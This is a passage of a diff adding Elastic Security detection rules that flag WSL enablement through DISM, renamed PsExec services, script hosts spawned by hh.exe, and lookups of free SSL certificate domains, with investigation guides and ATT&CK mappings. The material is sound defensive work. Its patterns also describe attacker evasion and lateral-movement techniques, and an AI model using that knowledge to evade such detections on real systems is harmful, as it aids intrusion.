Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (process.name : \"Dism.exe\" or ?process.pe.original_file_name == \"DISM.EXE\") and \n process.command_line : \"*Microsoft-Windows-Subsystem-Linux*\"\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2e0537d-7d8f-4910-a11d-559bcf61295a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "e2e0537d-7d8f-4910-a11d-559bcf61295a_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json new file mode 100644 index 00000000000..0762cbaa301 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Execution via Renamed PsExec Executable", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Execution via Renamed PsExec Executable\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies instances where the PsExec service component is executed using a custom name. This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json new file mode 100644 index 00000000000..b42b8083ebd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Execution via Renamed PsExec Executable", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Execution via Renamed PsExec Executable\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies instances where the PsExec service component is executed using a custom name. This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json new file mode 100644 index 00000000000..2df3059654f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_109.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "false_positives": [ + "The HTML Help executable program (hh.exe) runs whenever a user clicks a compiled help (.chm) file or menu item that opens the help file inside the Help Viewer. This is not always malicious, but adversaries may abuse this technology to conceal malicious code." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Activity via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "e3343ab9-4245-4715-b344-e11c56b0a47f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json new file mode 100644 index 00000000000..89615093ff8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_110.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "false_positives": [ + "The HTML Help executable program (hh.exe) runs whenever a user clicks a compiled help (.chm) file or menu item that opens the help file inside the Help Viewer. This is not always malicious, but adversaries may abuse this technology to conceal malicious code." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Activity via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e3343ab9-4245-4715-b344-e11c56b0a47f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json new file mode 100644 index 00000000000..574109d3bc4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Free SSL Certificate Providers", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1573", + "name": "Encrypted Channel", + "reference": "https://attack.mitre.org/techniques/T1573/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json 